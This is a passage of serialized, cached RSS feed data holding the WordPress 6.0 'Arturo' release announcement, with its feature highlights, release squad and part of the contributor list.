weeks.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"12940\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"WordPress 6.0 “Arturo”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"https://wordpress.org/news/2022/05/arturo/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 24 May 2022 20:01:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:3:\"6.0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=12879\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:278:\"Say hello to “Arturo” and WordPress 6.0, inspired by Grammy-winning jazz musician, Arturo O’Farrill. With nearly 1,000 enhancements and bug fixes, the second major release of 2022 is here. Download it now! As of today, WordPress powers more than 42% of websites worldwide.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:58530:\"\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"4161\" height=\"2822\" src=\"https://i2.wp.com/wordpress.org/news/files/2022/05/Main-image-News-post.png?fit=4161%2C2822&amp;ssl=1\" alt=\"WordPress 6.0 Arturo\" class=\"wp-image-12919\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2022/05/Main-image-News-post.png?w=4161&amp;ssl=1 4161w, https://i2.wp.com/wordpress.org/news/files/2022/05/Main-image-News-post.png?resize=300%2C203&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2022/05/Main-image-News-post.png?resize=1024%2C694&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2022/05/Main-image-News-post.png?resize=768%2C521&amp;ssl=1 768w, https://i2.wp.com/wordpress.org/news/files/2022/05/Main-image-News-post.png?resize=1536%2C1042&amp;ssl=1 1536w, https://i2.wp.com/wordpress.org/news/files/2022/05/Main-image-News-post.png?resize=2048%2C1389&amp;ssl=1 2048w, https://i2.wp.com/wordpress.org/news/files/2022/05/Main-image-News-post.png?w=3000&amp;ssl=1 3000w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></figure>\n\n\n\n<h2>Welcome to &#8220;Arturo&#8221;</h2>\n\n\n\n<p>Say hello to “Arturo” and WordPress 6.0, inspired by Grammy-winning jazz musician, <a href=\"https://en.wikipedia.org/wiki/Arturo_O\'Farrill\">Arturo O’Farrill</a>. Known for his influence on contemporary Latin jazz, Arturo has pressed more than 15 albums spanning a body of work across five decades.&nbsp;</p>\n\n\n\n<p>Take some time to explore WordPress 6.0, built to help you unlock your creative aspirations and make your site-building experience more intuitive. And check out some of Arturo’s inspirational sounds that span Afro Cuban jazz, contemporary Latin jazz, and so much more.</p>\n\n\n\n<p>With nearly 1,000 enhancements and bug fixes, the second major release of 2022 is here. <a href=\"https://wordpress.org/wordpress-6.0.zip\">Download it now</a>! As of today, WordPress powers more than 42% of websites worldwide.<sup><a href=\"#footnote\">1</a></sup></p>\n\n\n\n<p>Site owners and administrators should upgrade to take full advantage of the many stability, performance, and usability enhancements today. WordPress content creators will enjoy a suite of new features geared toward improving the writing and designing experiences.</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>Expanding Gutenberg into a full site editing experience in WordPress means that all of the problems the community had to address were complex and far-reaching. WordPress 6.0 is an example of the community’s commitment to tackling these tough challenges together. With thoughtful updates to the writing experience, building better block functionality, and adding a new intuitive style switcher, I’m really proud of the work that’s been done in this release to make a great site editing experience.</p><cite>Josepha Haden Chomphosy, Executive Director</cite></blockquote>\n\n\n\n<div class=\"is-layout-flex wp-block-buttons\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link\" href=\"https://wordpress.org/wordpress-6.0.zip\">Download WordPress 6.0</a></div>\n</div>\n\n\n\n<h2>What’s Inside</h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"1204\" height=\"700\" src=\"https://i2.wp.com/wordpress.org/news/files/2022/05/Writing-Improvements-1.png?fit=1204%2C700&amp;ssl=1\" alt=\"Selecting multiple lines of text from two blocks\" class=\"wp-image-12887\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2022/05/Writing-Improvements-1.png?w=1204&amp;ssl=1 1204w, https://i2.wp.com/wordpress.org/news/files/2022/05/Writing-Improvements-1.png?resize=300%2C174&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2022/05/Writing-Improvements-1.png?resize=1024%2C595&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2022/05/Writing-Improvements-1.png?resize=768%2C447&amp;ssl=1 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></figure>\n\n\n\n<h3>Enhanced Writing Experience</h3>\n\n\n\n<p>Writing improvements abound, whether you’re writing a brand new post or adding elements to an existing page. Explore more ways to streamline your content creation process, including:</p>\n\n\n\n<ul><li>Select text across multiple blocks for easier copying and pasting.</li><li>Type two open brackets `<code>[[</code>` to quickly access a list of recent posts and pages.</li><li>Keep existing styles when you transform some blocks from one kind to another—from a Paragraph block to a Code block, for instance.</li><li>Create customized buttons and any new buttons you make will retain the style customizations automatically.</li><li>Make tag clouds and social icons even more appealing with updated settings and controls, and a new outline style for the tag cloud.</li></ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"1204\" height=\"700\" src=\"https://i0.wp.com/wordpress.org/news/files/2022/05/Style-switcher-big.gif?fit=1204%2C700&amp;ssl=1\" alt=\"Style variations of Twenty Twenty Two theme\" class=\"wp-image-12893\" /></figure>\n\n\n\n<h3>Style Switching&nbsp;</h3>\n\n\n\n<p>Block themes now include the option to contain multiple style variations. This expands the new Style system even further and enables shortcuts to switch the look and feel of your site all within a single theme. In block themes that support this feature, you can change both the available settings, like the font-weight, and the style options, like the default color palette. Change the look and feel of your site with just a few clicks.</p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"1204\" height=\"700\" src=\"https://i2.wp.com/wordpress.org/news/files/2022/05/Expanded-templates.png?fit=1204%2C700&amp;ssl=1\" alt=\"Popover listing available templates\" class=\"wp-image-12889\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2022/05/Expanded-templates.png?w=1204&amp;ssl=1 1204w, https://i2.wp.com/wordpress.org/news/files/2022/05/Expanded-templates.png?resize=300%2C174&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2022/05/Expanded-templates.png?resize=1024%2C595&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2022/05/Expanded-templates.png?resize=768%2C447&amp;ssl=1 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></figure>\n\n\n\n<h3>More Template Choices</h3>\n\n\n\n<p>WordPress 6.0 includes five new template options for block themes: author, date, categories, tag, and taxonomy. These additional templates provide greater flexibility for content creators. Tailor each with the tools you already know or with the following new options in this release:&nbsp;</p>\n\n\n\n<ul><li>Featured images can be used in the cover block.</li><li>New featured image sizing controls make it easier to get the results you want.</li><li>While editing a template, at the root, or between blocks, the quick inserter shows you patterns and template parts to help you work faster and discover new layout options.</li><li>The query block supports filtering on multiple authors, support for custom taxonomies, and support for customizing what is shown when there are no results.</li></ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"1204\" height=\"700\" src=\"https://i1.wp.com/wordpress.org/news/files/2022/05/Integrated-Patterns.png?fit=1204%2C700&amp;ssl=1\" alt=\"Browsing footer patterns in the quick inserter\" class=\"wp-image-12890\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2022/05/Integrated-Patterns.png?w=1204&amp;ssl=1 1204w, https://i1.wp.com/wordpress.org/news/files/2022/05/Integrated-Patterns.png?resize=300%2C174&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2022/05/Integrated-Patterns.png?resize=1024%2C595&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2022/05/Integrated-Patterns.png?resize=768%2C447&amp;ssl=1 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></figure>\n\n\n\n<h3>Integrated Patterns</h3>\n\n\n\n<p>Patterns will now appear when you need them in even more places, like in the quick inserter or when creating a new header or footer. If you’re a block theme author, you can even <a href=\"https://developer.wordpress.org/block-editor/reference-guides/block-api/block-patterns/\">register patterns from the Pattern Directory using `<code>theme.json</code>`</a>, enabling you to prioritize specific patterns that are most helpful to your theme’s users.</p>\n\n\n\n<h3>Additional Design Tools</h3>\n\n\n\n<p>Design tools grow more powerful and intuitive with each release. Some highlights for 6.0 include:&nbsp;</p>\n\n\n\n<ul><li>A new color panel design saves space, but still shows your options at a glance.&nbsp;</li><li>New border controls offer a simpler way to set your border exactly as you like it.&nbsp;</li><li>Transparency levels for your colors allow for even more creative color options.</li><li>Control gaps, margins, typography, and more on a collection of blocks, all at once, in the Group block.</li><li>Switch between stack, row, and group variations to position groups of blocks with more layout flexibility.</li><li>Use the gap support functionality in the Gallery block to create different looks – from adding spacing between all images, to removing spacing altogether.</li></ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"1204\" height=\"700\" src=\"https://i0.wp.com/wordpress.org/news/files/2022/05/List-view.png?fit=1204%2C700&amp;ssl=1\" alt=\"Selecting multiple blocks in the list view\" class=\"wp-image-12891\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2022/05/List-view.png?w=1204&amp;ssl=1 1204w, https://i0.wp.com/wordpress.org/news/files/2022/05/List-view.png?resize=300%2C174&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2022/05/List-view.png?resize=1024%2C595&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2022/05/List-view.png?resize=768%2C447&amp;ssl=1 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></figure>\n\n\n\n<h3>Better List View</h3>\n\n\n\n<p>New keyboard shortcuts enable you to select multiple blocks from the list view, modify them in bulk, and drag and drop them within the list. List View can be opened and closed easily; it comes collapsed by default and it automatically expands to the current selection whenever you select a block.&nbsp;</p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"1204\" height=\"700\" src=\"https://i1.wp.com/wordpress.org/news/files/2022/05/Block-Locking-Controls.png?fit=1204%2C700&amp;ssl=1\" alt=\"Unlocking the block in the block toolbar\" class=\"wp-image-12892\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2022/05/Block-Locking-Controls.png?w=1204&amp;ssl=1 1204w, https://i1.wp.com/wordpress.org/news/files/2022/05/Block-Locking-Controls.png?resize=300%2C174&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2022/05/Block-Locking-Controls.png?resize=1024%2C595&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2022/05/Block-Locking-Controls.png?resize=768%2C447&amp;ssl=1 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></figure>\n\n\n\n<h3>Block Locking Controls</h3>\n\n\n\n<p>Now you can lock your blocks. Choose to disable the option to move a block, remove a block, or both. This simplifies project handover, allowing your clients to unleash their creativity without worrying about accidentally breaking their site in the process.</p>\n\n\n\n<h2>Improved Performance in WordPress 6.0</h2>\n\n\n\n<p>This release includes several updates focused on improving the performance of WordPress. These enhancements cover a range of performance areas including improving the page and post-load speed, reducing the execution time of various query types, caching, navigation menus, and much more. The performance team working group is an important focus area of the core development team. For more information on this group’s work, please follow their work on Making WordPress with the <a href=\"https://make.wordpress.org/core/tag/performance/\">#performance hashtag</a>.</p>\n\n\n\n<h2>Enhancing WordPress 6.0 Accessibility</h2>\n\n\n\n<p>Accessibility is an integral part of the WordPress mission of fostering an inclusive community and supporting users of all types around the world. With this in mind, WordPress 6.0 includes more than 50 updates specifically focused on enhancing the accessibility of the platform. You can <a href=\"https://make.wordpress.org/core/2022/04/20/wordpress-6-0-accessibility-improvements/\">read about these updates</a> and learn more about the accessibility initiatives that are ongoing.</p>\n\n\n\n<h2>Learn More About WordPress 6.0</h2>\n\n\n\n<p>See WordPress 6.0 in action! <a href=\"https://www.youtube.com/watch?v=oe452WcY7fA\">Watch a brief overview video</a> highlighting some of the major features debuting in WordPress 6.0.</p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" class=\"youtube-player\" width=\"600\" height=\"338\" src=\"https://www.youtube.com/embed/oe452WcY7fA?version=3&#038;rel=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;fs=1&#038;hl=en-US&#038;autohide=2&#038;wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation\"></iframe>\n</div></figure>\n\n\n\n<p>Explore <a href=\"https://learn.wordpress.org/\">learn.wordpress.org</a> for quick how-to videos and lots more on new features in WordPress. Or join a live <a href=\"https://learn.wordpress.org/social-learning/\">interactive online learning session</a> on a specific WordPress topic.</p>\n\n\n\n<p>Developers can explore the <a href=\"https://make.wordpress.org/core/2022/05/03/wordpress-6-0-field-guide/\">WordPress 6.0 Field Guide</a>. It is overflowing with detailed developer notes to help you build with and extend WordPress.</p>\n\n\n\n<p>Read the <a href=\"https://wordpress.org/support/wordpress-version/version-6-0/\">WordPress 6.0 Release Notes</a> for more information on the included enhancements and issues fixed, installation information, developer notes and resources, release contributors, and the list of file changes in this release.</p>\n\n\n\n<h2>The WordPress 6.0 Release Squad</h2>\n\n\n\n<p>The group listed below tirelessly supported the release, from conception to ship date, and beyond:</p>\n\n\n\n<ul><li>Release Lead: <a href=\"https://profiles.wordpress.org/matt/\">Matt Mullenweg</a>&nbsp;</li><li>Release Coordinators: <a href=\"https://profiles.wordpress.org/priethor/\">Héctor Prieto</a> and <a href=\"https://profiles.wordpress.org/annezazu/\">Anne McCarthy</a></li><li>Core Tech Lead: <a href=\"https://profiles.wordpress.org/peterwilsoncc/\">Peter Wilson</a></li><li>Editor Tech Leads: <a href=\"https://profiles.wordpress.org/zieladam/\">Adam Zieliński</a> and <a href=\"https://profiles.wordpress.org/gziolo/\">Greg Ziółkowski</a></li><li>Core Triage Leads: <a href=\"https://profiles.wordpress.org/chaion07/\">Ahmed Chaion</a> and <a href=\"https://profiles.wordpress.org/costdev/\">Colin Stewart</a></li><li>Editor Triage Lead: <a href=\"https://profiles.wordpress.org/ndiego/\">Nick Diego</a></li><li>Documentation Leads: <a href=\"https://profiles.wordpress.org/bph/\">Birgit Pauli-Haack</a>, <a href=\"https://profiles.wordpress.org/milana_cap/\">Milana Cap</a>, and <a href=\"https://profiles.wordpress.org/webcommsat/\">Abha Thakor</a></li><li>Marketing &amp; Communications Lead: <a href=\"https://profiles.wordpress.org/dansoschin/\">Dan Soschin</a></li><li>Test Leads: <a href=\"https://profiles.wordpress.org/boniu91/\">Piotrek Boniu</a> and <a href=\"https://profiles.wordpress.org/ironprogrammer/\">Brian Alexander</a></li><li>Design Lead: <a href=\"https://profiles.wordpress.org/critterverse/\">Channing Ritter</a></li></ul>\n\n\n\n<h2>Thank you to 500+ Contributors</h2>\n\n\n\n<p>WordPress 6.0 would not have been possible without the contributions of more than 500 people in at least 58 countries. Their asynchronous coordination to deliver hundreds of enhancements and fixes into a stable release is a testament to the power and capability of the WordPress community.</p>\n\n\n<p class=\"is-style-wporg-props-long alignfull\"><a href=\"https://profiles.wordpress.org/jorbin/\">Aaron Jorbin</a> · <a href=\"https://profiles.wordpress.org/aaronrobertshaw/\">Aaron Robertshaw</a> · <a href=\"https://profiles.wordpress.org/abdullahramzan/\">Abdullah Ramzan</a> · <a href=\"https://profiles.wordpress.org/webcommsat/\">Abha Thakor</a> · <a href=\"https://profiles.wordpress.org/adamsilverstein/\">Adam Silverstein</a> · <a href=\"https://profiles.wordpress.org/zieladam/\">Adam Zielinski</a> · <a href=\"https://profiles.wordpress.org/addiestavlo/\">Addie</a> · <a href=\"https://profiles.wordpress.org/adi64bit/\">adi64bit</a> · <a href=\"https://profiles.wordpress.org/oztaser/\">Adil &#214;ztaşer</a> · <a href=\"https://profiles.wordpress.org/aadilali/\">Adil Ali</a> · <a href=\"https://profiles.wordpress.org/agepcom/\">agepcom</a> · <a href=\"https://profiles.wordpress.org/chaion07/\">Ahmed Chaion</a> · <a href=\"https://profiles.wordpress.org/wildworks/\">Aki Hamano</a> · <a href=\"https://profiles.wordpress.org/atachibana/\">Akira Tachibana</a> · <a href=\"https://profiles.wordpress.org/schlessera/\">Alain Schlesser</a> · <a href=\"https://profiles.wordpress.org/alanjacobmathew/\">Alan Jacob Mathew</a> · <a href=\"https://profiles.wordpress.org/alansyue/\">alansyue</a> · <a href=\"https://profiles.wordpress.org/aljullu/\">Albert Juh&#233; Lluveras</a> · <a href=\"https://profiles.wordpress.org/albertomake/\">albertomake</a> · <a href=\"https://profiles.wordpress.org/alefesouza/\">Alefe Souza</a> · <a href=\"https://profiles.wordpress.org/alex897/\">Aleksandar Kostov</a> · <a href=\"https://profiles.wordpress.org/xknown/\">Alex Concha</a> · <a href=\"https://profiles.wordpress.org/ajlende/\">Alex Lende</a> · <a href=\"https://profiles.wordpress.org/viper007bond/\">Alex Mills</a> · <a href=\"https://profiles.wordpress.org/alexstine/\">Alex Stine</a> · <a href=\"https://profiles.wordpress.org/aliakseyenkaihar/\">aliakseyenkaihar</a> · <a href=\"https://profiles.wordpress.org/alkesh7/\">Alkesh Miyani</a> · <a href=\"https://profiles.wordpress.org/alokstha1/\">Alok Shrestha</a> · <a href=\"https://profiles.wordpress.org/shedonist/\">Amanda Giles</a> · <a href=\"https://profiles.wordpress.org/afercia/\">Andrea Fercia</a> · <a href=\"https://profiles.wordpress.org/andraganescu/\">Andrei Draganescu</a> · <a href=\"https://profiles.wordpress.org/_smartik_/\">Andrei Surdu</a> · <a href=\"https://profiles.wordpress.org/aandrewdixon/\">Andrew Dixon</a> · <a href=\"https://profiles.wordpress.org/nacin/\">Andrew Nacin</a> · <a href=\"https://profiles.wordpress.org/azaozz/\">Andrew Ozz</a> · <a href=\"https://profiles.wordpress.org/andrewserong/\">Andrew Serong</a> · <a href=\"https://profiles.wordpress.org/rarst/\">Andrey \"Rarst\" Savchenko</a> · <a href=\"https://profiles.wordpress.org/oandregal/\">André</a> · <a href=\"https://profiles.wordpress.org/afragen/\">Andy Fragen</a> · <a href=\"https://profiles.wordpress.org/la-geek/\">Angelika Reisiger</a> · <a href=\"https://profiles.wordpress.org/ankit-k-gupta/\">Ankit K Gupta</a> · <a href=\"https://profiles.wordpress.org/annezazu/\">Anne McCarthy</a> · <a href=\"https://profiles.wordpress.org/anoopranawat/\">Anoop Ranawat</a> · <a href=\"https://profiles.wordpress.org/antpb/\">Anthony Burchell</a> · <a href=\"https://profiles.wordpress.org/paranoia1906/\">Anthony Ledesma</a> · <a href=\"https://profiles.wordpress.org/antonvlasenko/\">Anton Vlasenko</a> · <a href=\"https://profiles.wordpress.org/antonrinas/\">antonrinas</a> · <a href=\"https://profiles.wordpress.org/antonynz/\">Antony Booker</a> · <a href=\"https://profiles.wordpress.org/arcangelini/\">arcangelini</a> · <a href=\"https://profiles.wordpress.org/aristath/\">Ari Stathopoulos</a> · <a href=\"https://profiles.wordpress.org/arnee/\">Arne</a> · <a href=\"https://profiles.wordpress.org/arpitgshah/\">Arpit G Shah</a> · <a href=\"https://profiles.wordpress.org/artdecotech/\">artdecotech</a> · <a href=\"https://profiles.wordpress.org/madeinua/\">ArteMa</a> · <a href=\"https://profiles.wordpress.org/arthur791004/\">Arthur Chu</a> · <a href=\"https://profiles.wordpress.org/asaquzzaman/\">Asaquzzaman mishu</a> · <a href=\"https://profiles.wordpress.org/atomicjack/\">atomicjack</a> · <a href=\"https://profiles.wordpress.org/ajoah/\">Aur&#233;lien Joahny</a> · <a href=\"https://profiles.wordpress.org/aurooba/\">Aurooba Ahmed</a> · <a href=\"https://profiles.wordpress.org/barryhughes/\">Barry</a> · <a href=\"https://profiles.wordpress.org/barryceelen/\">Barry Ceelen</a> · <a href=\"https://profiles.wordpress.org/bartoszgadomski/\">Bartosz Gadomski</a> · <a href=\"https://profiles.wordpress.org/bedas/\">Beda</a> · <a href=\"https://profiles.wordpress.org/scruffian/\">Ben Dwyer</a> · <a href=\"https://profiles.wordpress.org/utz119/\">Benachi</a> · <a href=\"https://profiles.wordpress.org/bernhard-reiter/\">Bernie Reiter</a> · <a href=\"https://profiles.wordpress.org/bettyjj/\">BettyJJ</a> · <a href=\"https://profiles.wordpress.org/bhrugesh12/\">Bhrugesh Bavishi</a> · <a href=\"https://profiles.wordpress.org/binarymoon/\">binarymoon</a> · <a href=\"https://profiles.wordpress.org/birgire/\">Birgir Erlendsson (birgire)</a> · <a href=\"https://profiles.wordpress.org/bph/\">Birgit Pauli-Haack</a> · <a href=\"https://profiles.wordpress.org/supercleanse/\">Blair Williams</a> · <a href=\"https://profiles.wordpress.org/blogaid/\">BlogAid</a> · <a href=\"https://profiles.wordpress.org/boonebgorges/\">Boone Gorges</a> · <a href=\"https://profiles.wordpress.org/wpe_bdurette/\">Brandon DuRette</a> · <a href=\"https://profiles.wordpress.org/kraftbj/\">Brandon Kraft</a> · <a href=\"https://profiles.wordpress.org/ironprogrammer/\">Brian Alexander</a> · <a href=\"https://profiles.wordpress.org/bronsonquick/\">bronsonquick</a> · <a href=\"https://profiles.wordpress.org/brookemk/\">Brooke Kaminski</a> · <a href=\"https://profiles.wordpress.org/brookedot/\">Brooke.</a> · <a href=\"https://profiles.wordpress.org/ribaricplusplus/\">Bruno Ribaric</a> · <a href=\"https://profiles.wordpress.org/caraya/\">caraya</a> · <a href=\"https://profiles.wordpress.org/cbravobernal/\">Carlos Bravo</a> · <a href=\"https://profiles.wordpress.org/carlosgprim/\">Carlos Garcia</a> · <a href=\"https://profiles.wordpress.org/poena/\">Carolina Nymark</a> · <a href=\"https://profiles.wordpress.org/cbigler/\">cbigler</a> · <a href=\"https://profiles.wordpress.org/shireling/\">Chad Chadbourne</a> · <a href=\"https://profiles.wordpress.org/critterverse/\">Channing Ritter</a> · <a href=\"https://profiles.wordpress.org/charleyparkerdesign/\">charleyparkerdesign</a> · <a href=\"https://profiles.wordpress.org/charlyox/\">charlyox</a> · <a href=\"https://profiles.wordpress.org/chintan1896/\">Chintan hingrajiya</a> · <a href=\"https://profiles.wordpress.org/cbringmann/\">Chloe Bringmann</a> · <a href=\"https://profiles.wordpress.org/chouby/\">Chouby</a> · <a href=\"https://profiles.wordpress.org/clubkert/\">Chris Lubkert</a> · <a href=\"https://profiles.wordpress.org/chrisvanpatten/\">Chris Van Patten</a> · <a href=\"https://profiles.wordpress.org/chriscct7/\">chriscct7</a> · <a href=\"https://profiles.wordpress.org/clonemykey/\">clonemykey</a> · <a href=\"https://profiles.wordpress.org/costdev/\">Colin Stewart</a> · <a href=\"https://profiles.wordpress.org/conner_bw/\">conner_bw</a> · <a href=\"https://profiles.wordpress.org/cr0ybot/\">Cory Hughart</a> · <a href=\"https://profiles.wordpress.org/courane01/\">Courtney Robertson</a> · <a href=\"https://profiles.wordpress.org/mitogh/\">Crisoforo Gaspar</a> · <a href=\"https://profiles.wordpress.org/dansoschin/\">Dan Soschin</a> · <a href=\"https://profiles.wordpress.org/danielbachhuber/\">Daniel Bachhuber</a> · <a href=\"https://profiles.wordpress.org/danieliser/\">Daniel Iser</a> · <a href=\"https://profiles.wordpress.org/talldanwp/\">Daniel Richards</a> · <a href=\"https://profiles.wordpress.org/danieldudzic/\">danieldudzic</a> · <a href=\"https://profiles.wordpress.org/darerodz/\">darerodz</a> · <a href=\"https://profiles.wordpress.org/uofaberdeendarren/\">Darren Coutts</a> · <a href=\"https://profiles.wordpress.org/htdat/\">Dat Hoang</a> · <a href=\"https://profiles.wordpress.org/get_dave/\">Dave Smith</a> · <a href=\"https://profiles.wordpress.org/davidbaumwald/\">David Baumwald</a> · <a href=\"https://profiles.wordpress.org/davidbinda/\">David Biňovec</a> · <a href=\"https://profiles.wordpress.org/dpcalhoun/\">David Calhoun</a> · <a href=\"https://profiles.wordpress.org/dgwyer/\">David Gwyer</a> · <a href=\"https://profiles.wordpress.org/dlh/\">David Herrera</a> · <a href=\"https://profiles.wordpress.org/dshanske/\">David Shanske</a> · <a href=\"https://profiles.wordpress.org/devutpol/\">Deb Nath Utpol</a> · <a href=\"https://profiles.wordpress.org/delowardev/\">Delowar Hossain</a> · <a href=\"https://profiles.wordpress.org/denishua/\">denishua</a> · <a href=\"https://profiles.wordpress.org/dennisatyoast/\">Dennis Claassen</a> · <a href=\"https://profiles.wordpress.org/dmsnell/\">Dennis Snell</a> · <a href=\"https://profiles.wordpress.org/dhanendran/\">Dhanendran</a> · <a href=\"https://profiles.wordpress.org/dharm1025/\">Dharmesh Patel</a> · <a href=\"https://profiles.wordpress.org/dhusakovic/\">dhusakovic</a> · <a href=\"https://profiles.wordpress.org/dilipbheda/\">Dilip Bheda</a> · <a href=\"https://profiles.wordpress.org/dd32/\">Dion Hulse</a> · <a href=\"https://profiles.wordpress.org/ocean90/\">Dominik Schilling</a> · <a href=\"https://profiles.wordpress.org/donmhico/\">donmhico</a> · <a href=\"https://profiles.wordpress.org/drago239/\">drago239</a> · <a href=\"https://profiles.wordpress.org/drewapicture/\">Drew Jaynes</a> · <a href=\"https://profiles.wordpress.org/dromero20/\">dromero20</a> · <a href=\"https://profiles.wordpress.org/eddystile/\">Eddy</a> · <a href=\"https://profiles.wordpress.org/ehtis/\">Ehtisham S.</a> · <a href=\"https://profiles.wordpress.org/eliezerspp/\">Eliezer Pe&#241;a</a> · <a href=\"https://profiles.wordpress.org/ellatrix/\">Ella van Durpe</a> · <a href=\"https://profiles.wordpress.org/manooweb/\">Emmanuel Hesry</a> · <a href=\"https://profiles.wordpress.org/lopo/\">Enrico Battocchi</a> · <a href=\"https://profiles.wordpress.org/eric3d/\">eric3d</a> · <a href=\"https://profiles.wordpress.org/kebbet/\">Erik Betshammar</a> · <a href=\"https://profiles.wordpress.org/espiat/\">espiat</a> · <a href=\"https://profiles.wordpress.org/estelaris/\">estelaris</a> · <a href=\"https://profiles.wordpress.org/etaproducto/\">etaproducto</a> · <a href=\"https://profiles.wordpress.org/everpress/\">EverPress</a> · <a href=\"https://profiles.wordpress.org/fabiankaegy/\">Fabian K&#228;gy</a> · <a href=\"https://profiles.wordpress.org/iogui/\">Fabio Blanco</a> · <a href=\"https://profiles.wordpress.org/faison/\">Faison</a> · <a href=\"https://profiles.wordpress.org/felipeelia/\">Felipe Elia</a> · <a href=\"https://profiles.wordpress.org/flixos90/\">Felix Arntz</a> · <a href=\"https://profiles.wordpress.org/femkreations/\">Femy Praseeth</a> · <a href=\"https://profiles.wordpress.org/florianbrinkmann/\">Florian Brinkmann</a> · <a href=\"https://profiles.wordpress.org/mista-flo/\">Florian TIAR</a> · <a href=\"https://profiles.wordpress.org/foliovision/\">FolioVision</a> · <a 